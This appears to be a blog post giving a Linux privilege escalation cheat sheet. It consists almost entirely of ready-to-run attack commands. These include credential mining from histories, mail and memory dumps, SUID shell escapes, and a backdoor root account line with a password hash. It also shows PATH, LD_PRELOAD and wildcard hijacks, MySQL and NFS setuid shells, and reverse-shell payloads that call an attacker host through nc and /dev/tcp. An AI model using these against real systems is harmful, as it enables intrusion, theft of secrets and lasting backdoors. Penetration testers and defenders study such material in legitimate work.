abcdef: Privilege Escalation

Privilege Escalation - Linux

Privilege escalation or vertical privilege escalation means elevating access from a limited user by abusing misconfigurations, design flaws, and features within the windows operating system.

OS System

File System Layout Reference: https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard
Command: cat /proc/version; uname -a; uname -mrs;rpm -q kernel;dmesg | grep Linux; ls /boot | grep vmlinuz-
Info: Prints out kernel information
Info: After identifying kernel version and OS version use searchsploit to find available exploits
Command: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/exploit_suggester.sh
Info: linux-exploit-suggester.sh is a script that can automate the process of identifying available exploits
Compiling Exploits

Command: gcc file.c -o file -static
Info: You can compile things statically (all dependencies/libraries are within the file) with gcc file.c -o file -static
Command: gcc -fPIC -shared -o lib.so lib.c -nostartfiles
Info: Compiles an independent positioned shared library
Reference: https://developers.redhat.com/blog/2018/03/21/compiler-and-linker-flags-gcc/
Reference: Compiling DitryCow and making it stable, DirtyCow https://github.com/cheetz/dirtycow/blob/master/THP-Lab

Networking and Communication

Command: hostname
Command: dnsdomainname
Command: ifconfig -a
Info: List all networking interfaces

Command: arp -e
Command: /sbin/route -nee
Info: Print ARP cache / IP Cache

Command: iptables -L

Command: netstat -antu
Info: Print Listening TCP Connections
Command: netstat -anu
Info: Print Listening UDP Connections
Command: route
Info: Print Network Routing Information
Command: cat /etc/sysconfig/network /etc/networks /etc/sysconfig/dhcpd /etc/dhcp/dhcpd.conf /etc/resolv.conf

Command: find -name ".htaccess" | xargs -r cat
Command: find -name ".htpasswd" | xargs -r cat
Command: mount; df -h; cat /etc/fstab
Info: list mounted file systems, if we find one we mount it and start the priv-esc process over again.

Networking Pilfering

Info: Script Scan for open ports on host
Command: for port in {1..65535}; do (echo > /dev/tcp/<enter ip>/$port) >& /dev/null && echo "Port $port seems to be open";done
Command: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Info: Attempt if tcpdump is possible

Port Forwarding

Command: ssh -L <bind-port>:127.0.0.1:<port-forward> root@attacker-ip
Info: On the target machine execute command to bind port to attacker
Command: ssh -R <bind-port>:127.0.0.1:<port-forward> root@attacker-ip
Reference: https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/localport-forward/
Command: mknod backpipe p ; nc -l -p <bind-port> < backpipe | nc <attacker-ip> <port-forward >backpipe
Command: mknod backpipe p ; nc -l -p <bind-port> 0 & < backpipe | tee -a inflow | nc localhost <port-forward> | tee -a outflow 1>backpipe
Command: mknod backpipe p ; nc -l -p <bind-port> 0 & < backpipe | tee -a inflow | nc localhost <prot-forward> | tee -a outflow & 1>backpipe

Tunneling

Command: sshuttle -r username@<target-ip> <broadcast-address on target network>.0/24
Command: sshuttle --dns -vvr username@<target-ip>0/0
Reference: sshuttle can be used to tunnel over ssh and dns, easy to use tool https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/sshuttle/
Command: ssh -D 127.0.0.1:9050 -N [root]@[attacker-ip]
Info: On target run command to listen to port 9050
Reference: https://github.com/rofl0r/proxychains-ng
Reference: https://artkond.com/2017/03/23/pivoting-guide/

Establishing Remote Shell

Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Reference: https://highon.coffee/blog/reverse-shell-cheat-sheet/

File Transfer

Command: find / -name wget
Command: find / -name netcat*
Command: find / -name tftp*
Command: find / -name ftp
Command: echo $(wget https://ATTACKER_IP/file) >> ~/tmp/file
Command: curl http://attacker-ip/file > file
Command# nc -w 10 <destination_ip> <port> < <file>
Command# nc -lvp <port> > <flle>
Info: Send file to and receive file

User, Group & Privilege Information

Command: whoami
Command: sudo -l
Info: List Sudoers with command privileges
Command: groups
Info: Prints assigned groups
Command: w
Info: List other logged on users
Command: last
Info: Prints last logged on users
Command: cat /etc/passwd | cut -d: -f1
Info: List Users and SIDs
Command: awk -F: '($3 == "0") {print}' /etc/passwd
Command: List Super Users
Command: id
Info: Print User ID
Info: Cool trick create a user matching there id using useradd -u <userid> <user>
Command: find / -perm -u=s -type f | xargs -r ls -la
Command: cat /etc/profile /etc/bashrc ~/.bash_profile ~/.bashrc ~/.bash_logout
Command: env
Command: set
Info: Prints User Environment Variables Configured On System
Info Run command as another user
Command: sudo -u <username>

Password Mining

Understanding Hash Formats

Reference: https://www.aychedee.com/2012/03/14/etc_shadow-password-hash-formats/
$1$ = md5
$2a$ = Blowfish
$2y$ = Blowfish, with correct handling of 8 bit characters
$5$ = sha256
$6$ = sha512

Search For Creds On File System

Command: ./LinEnum.sh -t -k password
Info: LinEnum is a script designed to help identify weakness within linux system that can be used to gain privilege escalation
Reference: https://github.com/rebootuser/LinEnum
Command: cat ~/.*_history
Command: cat /etc/pam.d/system-auth
Info: Check if Password Lockout Policy Set
Command: cat /var/apache2/config.inc /var/lib/mysql/mysql/user.MYD /root/anaconda-ks.cfg
Info: Creds Stored in Scripts/Database files
Command: cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
Info: Use grep -i to search for specific strings "passw" "user"
Command: find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
Info: Creds stored on a Joomal CMS Server
Command: cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
Info: Creds possible stored in mail
Command: ls -al ~/.ssh/authorized_keys
Command: ls -al /etc/ssh/
Info: Check to see if SSH authorized keys are available
Info: Use ssh -i <cert> host to authenticate ssh with cert

Creds Stored in Memory

Command: ps -ef
Info: List Process and look for Session oriented Services, such as ssh or ftp, and make note of its pid
Command: gdb -p <pid of service>
Info: Launch gdb and attach it to the specified pid
Command: gdb> info proc mappings
Info: Prints mapped address make note of the start and end address from [HEAP]
Command: dump memory /tmp/mem [start-address] [end-address]
Info: Dump the memory contents and use strings to parser the memory dump file

Hacking The File System

Search for World Writable Directories Or Files

Command: find / -writable -type d 2>/dev/null
Info: Checks world-writeable folders
Command: find / -perm -222 -type d 2>/dev/null
Info: Checks world-writeable folders
Command: find / -perm -o w -type d 2>/dev/null
Info: Checks world-writeable folders
Command: find / -perm -o x -type d 2>/dev/null
Info: Checks world-executable folders
Command: find $ -perm -o w -perm -o x $ -type d 2>/dev/null
Info: Checks world-writeable & executable folders
Command: find / -xdev -type $ -perm -0002 -a ! -perm -1000 $ -print
Info: Checks world-writeable files
Command: find /dir -xdev $ -nouser -o -nogroup $ -print
Info: Checks Noowner files

SUID Binaries Attacks

Search For SUID Binaries

Command: find / -user root -perm -4000 -print 2>/dev/null
Command: find / -perm -u=s -type f 2>/dev/null
Command: find / -user root -perm -4000 -exec ls -ldb {} \;
Info: Common SUID Binaries that can be used to escalate to root
Info: In addition these commands can be used to escape restricted shell
Info: AWK
Command: awk 'BEGIN {system("/bin/bash")}'
Info: bash can be used to execute shell
Command: bash -p
Info: NMAP
Command: echo "os.execute('/bin/bash')" > x.nse
Command: nmap -script=x.nse
Command: nmap -V ( Version 4.53)
Command: nmap --interactive
Command: from nmap interactive menu execute !sh
Info: FIND
Command: find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
Info: LESS
Command: less /etc/shadow
Info: After reading a file using less execute !/bin/bash
Info: MORE
Command: more /etc/shadow
Info: After reading a file using more execute !/bin/bash
Info: MAN
Command: man ping
Command: After read the manual of a command execute !/bin/bash
Info: VI
Command: vim /etc/passwd
Info: After opening the vim editor execute shift + : then enter !/bin/bash
Info: ECHO can be used to execute shell
Command: echo os.system('/bin/bash')
Info: SH
Command: /bin/sh -i
Info: Python
Command: python -c "import pty;pty.spawn('/bin/bash');"
Info: Ruby
Command: echo "exec '/bin/bash';" > /tmp/root.rb
Command: ruby /tmp/root.rb
Info: PERL
Command: echo "exec '/bin/bash';" > /tmp/root.pl
Command: perl /tmp/root.pl
Command: perl —e 'exec "/bin/bash";'
Info: LUA
Command: echo "os.execute('/bin/bash')" > /tmp/root.lua
Command: lua /tmp/root.lua
Info: TCPDUMP
Command: echo $'id\n /bin/bash' > /tmp/.shell
Command: chmod +x /tmp/.shell
Command: sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
Info: BUSYBOX
Command: /bin/busybox telnetd -|/bin/bash -p9999
Info: NANO
Command: nano /etc/passwd
Info: Add the following line to create a backdoor account with root privs: backdoor:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
Info: This creates a user Backdoor and password test
Info: CP
Command: cp /etc/shadow /etc/shadow.bak
Command: cp -rf shadow /etc/shadow
Info: cp -rf can be used to overwrite files (create a spoofed shadow file)
Info: HT
Info: ht is a hex editor that can be used to modify files such as /etc/sudeors
Reference: http://hte.sourceforge.net/readme.html
Reference: http://theevilbit.blogspot.com/2013/11/kioptrix-level-3-walkthrough.html
Info: MV
Command: mv /etc/shadow /etc/shadow.bak
Command: mv shadow /etc/shadow
Info: mv can be used to overwrite files (create a spoofed shadow file)4
Info: NC
Command: nc -lvp 80 > server_passwd
Command: wget 127.0.0.1 –post-file /etc/passwd
Info: MOUNT
Command: mount -o bind /bin/bash /bin/mount
Command: mount
Reference: https://gtfobins.github.io/
Info: GTFOBINS provides a list of linux programs that can be used for PrvEsc

Hijacking Installed Programs

Leveraging Symlinks
Info: Symlinks can be used to obtain access to restricted files, or execute arbitrary code
Command: To create a symlink execute, ln -s <path-to-file> <file>
Command: To create a symlink in php execute, symlink(“/”, “./symroot”);

Hijack setuid binary

function <path-to-setuid-program> () { /bin/bash; }
export -f <path-to-setuid-program>
execute setuid program

Poising PATH

Info: adding a . in the path variable causes programs to execute arbitrary code
Info: To do this one needs to spoof a binary and cause an elevated user to run that spoofed binary, such as ls
Command: echo "/bin/bash" > ls
Command: chmod +x ls
Command: export PATH=.:$PATH
Info: Once ls is executed by an elevated user account bash will be called
Info: After setting the path directory, may need to reset it
Command: Execute export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Command: export TERM=xterm
Command: export SHELL=bash

Control Execution Flow

Info: If a script or program is calling another binary, we can hijack its path to execute an arbitrary command
Command: cd /tmp
Command: echo "/bin/bash" > <name-of-program>
Command: chmod +x <name-of-program>
Command: export PATH=/tmp:$PATH
Command: navigate back to the script or program and execute it

LD_PRELOAD Injection

Reference: get root payload, https://goo.gl/5Ztwtj
Command: compile payload, gcc -fPIC -shared -o /tmp/root.so root.c -nostartfiles
Command: Launch, LD_PRELOAD=/tmp/root.so apache2 <run any available setuid binary>

Shared Library DLL Injection:

Info: Trace a suid binary to identify missing library
Command: strace /usr/local/bin/<suid binar> 2>&1 | grep -i -E "open|access|no such file"
Info: If a shared library is missing compile a impersonated payload
Reference: Shared library payload, https://goo.gl/wMeAhV
Command: Compile payload, gcc -shared -o <path-to-missing-library> -fPIC <path-to-payload.c>

Abusing Wildcard (*)

Info: Look for scripts that contain the following commands:

Chown
Chmod
Tar
Rsync
Info: Good place cat /etc/crontab
Chown file reference trick (file owner hijacking)

Info: create a file and assign ownership to it
Command: touch hijack && chown user user hijack.php
Info: create a second file as --reference=.hijack.php
Command: touch --reference=.hijack.php

Chmod file reference trick

Info: create a file and assign ownership to it
Command: touch hijack && chown user user hijack.php
Info: create a second file as --reference=.hijack.php
Command: touch ./--reference=.hijack.php

Tar arbitrary command execution

Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash" > shell.sh
Command: echo "" > "--checkpoint-action=exec=sh shell.sh"
Command: echo "" > --checkpoint=1
Command: tar cf archive.tar *

Rsync arbitrary command execution

Command: touch ./'-e sh shell.c'
Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" >> shell.c && chmod +x shell.c

Attacking Processes And Services
Command: ps aux | grep root

Info: List running process running as root

Command: ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/

Info: Locate applications that are installed

Command: pkg_info

Info: Obtain Application Version Information on OpenBSD, FreeBSD

Command: dpkg -I

Info: Obtain Application Version information on Debian

Command: rpm -qa

Info: Obtain Application Version information on CentOS, OpenSuse, Fedora, RHEL

Command: find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp; find / -name tcpdump

Info: Find Interesting programs

Command: service --status-all

Info: List running services

Enumerate Service Logs

Command: cat /etc/httpd/logs/access_log /var/log/httpd/error.log /var/log/apache2/access_log /var/log/apache2/error_log /var/log/apache/access_log /var/log/auth.log /var/log/chttp.log /var/log/cups/error_log /var/log/dpkg.log /var/log/faillog /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/messages /var/log/secure /var/log/syslog /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/run/utmp /var/webmin/miniserv.log /var/www/logs/access_log

Command: ls -alh /var/lib/dhcp3/

Command: ls -alh /var/log/postgresql/

Command: ls -alh /var/log/proftpd/

Command: ls -alh /var/log/samba/

Known Vulnerable Servces

Info: Exim 4.84-3 and lower is vulnerable to local privilege exploit
Reference: https://www.exploit-db.com/exploits/39535/
Command: cat /etc/syslog.conf /etc/chttp.conf /etc/lighttpd.conf /etc/cups/cupsd.conf /etc/inetd.conf /etc/apache2/apache2.conf /etc/my.conf /etc/httpd/conf/httpd.conf /opt/lampp/etc/httpd.conf
Info: List Service Configurations to parse for vulnerabilities
Info: CoreHTTP configuration
Reference: https://www.exploit-db.com/exploits/10610/
Command: index.pl?page=`mknod backpipe p && nc <attacker-ipaddress> <listening-port> 0<backpipe | /bin/bash 1>backpipe&`
Info: URL encode the string above to send a request to the CoreHTTP Server
Info: LightHTTPd Web Server
Reference: https://www.exploit-db.com/exploits/4391/
Command: wget --referer="<?php system('/bin/bash -i > /dev/tcp/<attacker-ip>/<listening-port> 0<&1 2>&1'); ?>" localhost
Info: CUPS, Configures CUPS Printing Server's scheduler
Reference:https://www.exploit-db.com/exploits/41233/
Info: inetd.conf will load a network program based upon a request from the network - Check for vulnerabilties
Reference: https://docs.oracle.com/cd/E19253-01/816-5174/inetd.conf-4/index.html
Info: inetd.conf can possible result in a race condition, inetd responsible to close and open sockets/ports, however there are times when sockets are closed however ports can be left open allowing ports to bind to new connections
Command: cat /var/log/apache2/access.log
Info: Contains Web Client Access connections to Ubuntu Apache Web Servers
Command: cat /var/log/httpd/access_log
Info: Contains Web Client Access connections to RHEL Web Servers
Command: cat /etc/my.conf
Info: MySQL Configuration File
Command: cat /etc/httpd/conf/httpd.conf
Info: Apache HTTP Service Configuration File
Command: cat /opt/lampp/etc/httpd.conf
Info: LAMP HTTP Service Configuration
Command: ls -alhR /var/www/
Command: ls -alhR /srv/www/htdocs/
Command: ls -alhR /usr/local/www/apache22/data/
Command: ls -alhR /opt/lampp/htdocs/
Command: ls -alhR /var/www/html/

Known Vulnerable Services

SMB (SambaCry) versions:
3.5.0 - 4.x
4.x - 4.4.14
4.5.x - 4.5.9
Reference: https://github.com/opsxcq/exploit-CVE-2017-7494
MySQL Service (using a limited user)
Command: select sys_exec('whoami');
Info: Check if running as root
Info: From limited user create the following getsystem.c program in tmp directory

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

int main(void)

{

setuid(0); setgid(0); system(“/bin/bash”);

}
Command:gcc -o /tmp/shell /home/<user>/shell.c
Info: Compile the shell.c program
Command: mysql> select sys_exec('chmod +s /tmp/shell');
Info: using MySQL SetBit the shell payload to escalate as root
NFS

Command:cat /etc/exports
Info: Look for (rw,sync,no_root_squash)
Info: If no_root_squash tag is available we can escalate privs.
Use nfsshell and follow https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/
Info: On Attacker System execute:
Command: mkdir /tmp/victim
Command: mount -o rw, vers=2 target-ip:/tmp/victim
Command: echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/victim
Command: chmod +s /tmp/victim

TIPS

Recovering Deleted Files
Command: sudo grep -i -a -B100 -A100 'string' /dev/sda1 > file.txt

Replace /dev/sda1 with the device that the file was on and replace 'string' with the unique string in your file. This could take some time. But basically, what this does is it searches for the string on the device and then returns 100 lines before and after that line and puts it in file.txt. If you need more lines returned just adjust the -B and -A options as appropriate. You might get a bunch of extra garbage returned, but you should be able to get your text back.

Automation Tools

LinEnum
http://www.rebootuser.com/?p=1758
This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This include file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.

LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py

This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.

Resources
https://www.rebootuser.com/?p=1623
https://github.com/Shiva108/CTF-notes/blob/master/Kali%20Linux%20Offensive%20Security%20Certified%20Professional%20Playbook.html
http://pwnwiki.io/#!index.md
https://github.com/Shiva108/CTF-notes/blob/master/dostoevsky-pentest-notes-master/chapter-5.md
https://guif.re/linuxeop

abcdef

Friday, August 9, 2019

Privilege Escalation - Linux

Privilege Escalation - Linux

No comments:

Post a Comment

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

Search This Blog